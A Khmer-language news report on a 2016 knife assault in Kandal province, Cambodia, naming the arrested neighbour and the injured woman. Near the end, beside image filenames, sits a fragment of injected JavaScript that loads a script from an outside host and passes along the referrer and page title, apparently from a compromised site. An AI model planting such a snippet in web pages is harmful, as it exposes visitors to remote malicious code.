យកគ្រឿងបរិភោគអោយគេញយពេក គេគិតថាមើលងាយ ហើយវាយកាប់ប្រហារតែម្តង

 

ខេត្តកណ្តាល៖ បុរសម្នាក់ក្រោយពីប្រើហិង្សា ដោយប្រើកាំបិតប៉័ងតោ និងដងឈើវាយកាប់ប្រហារទៅលើស្ត្រីម្នាក់ បណ្តាលអោយបែកក្បាលផ្នែកខាងក្រោយបីកន្លែង និងលើភ្នែកខាងឆ្វេងមួយកន្លែងរបួសជាទង្ងន់ហើយនោះ ត្រូវបានសមត្ថកិច្ចចុះធ្វើការឃាត់ខ្លួនកាលពីវេលាម៉ោង៨ព្រឹក ថ្ងៃទី២២ ខែសីហា ឆ្នាំ២០១៦នេះ នៅចំណុចផ្ទះជនរងគ្រោះ ភូមិកោះចាស់ ឃុំព្រែកស្តី ស្រុកកោះធំ ខេត្តកណ្ដាល ។

 

សមត្ថកិច្ចបានអោយដឹងថាជនដែលបានប្រើហិង្សាទៅលើស្ត្រីរងគ្រោះ ហើយត្រូវបានសមត្ថកិច្ចអូស ក ឃាត់ខ្លននោះមានឈ្មោះ ឈឹម ឈាង ភេទប្រុស អាយុ ៣១ឆ្នាំទីលំនៅភូមិកោះចាស់ ឃុំព្រែកស្ដី ស្រុកកោះធំ ខេត្កណ្ដាល មុខរបរជាកម្មករ។ ចំណែកជនរងគ្រោះ ឈ្មោះ ស្រី សុខវង្ស ភេទស្រី អាយុ ៥៦ឆ្នាំ មុខរបរ កសិករ ទីលំនៅភូមិកោះចាស់ ឃុំព្រែកស្ដី ស្រុកកោះធំ ខេត្តកណ្ដាល។

 

ប្រភពដដែលបានអោយដឹងជនរងគ្រោះ និងជនសង្ស័យជាមនុស្សរស់នៅជិតខាងគ្នា ហើយមិនដែលមានទំនាស់ទាស់ទែងគ្នាអ្វីឡើយពីមុនមក។ ជនរងគ្រោះត្រូវបានគេអោយដឹងថា គឺជាមនុស្សមានចិត្តទូលាយ រាល់ពេលមានចំណីអាហារ គឺតែងតែអោយទៅជនសង្ស័យហូបចុកជាញឹកញាប់ ។ ប៉ុន្តែជនសង្ស័យ មានគំនិតច្រណែន ដោយគិតថាជនរងគ្រោះ មើលងាយក្រុមគ្រួសារខ្លួន ។ លុះមកដល់វេលាកើតហេតុខាងលើ នៅពេលដែលជនរង គ្រោះកំពុងតែសំរាក ក្នុងផ្ទះក៏ស្រាប់ តែជនសង្ស័យ បើកទ្វារចូលទៅក្នុងផ្ទះជនរងគ្រោះដោយក្នុងដៃមានកាន់កាំបិតបុ័ងតោចំនួន០១ រួចកាប់ទៅលើជនរងគ្រោះជាច្រើនកាំបិត បណ្តលអោយរងរបួសជាទម្ងន់ ។

 

ក្រោយពីបានទួលព័ត៌មានពីក្រុមគ្រួសារជនរងគ្រោះ សមត្ថកិច្ចនគរបាលជំនាញស្រុក សហការជាមួយប៉ុស្ដិ៍បានចុះស្រាវជ្រាវចាប់ឃាត់ខ្លួនបានជនសង្ស័យបានហើយបញ្ជូនមកកាន់ អធិការដ្ឋាននគរបាលស្រុកកោះធំ ដើម្បីចាត់ការតាមនីតិវិធី ។

 

 

14051606_2088222374736105_6733857422298008007_n 14064251_2088222324736110_1703604189721374567_ns.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More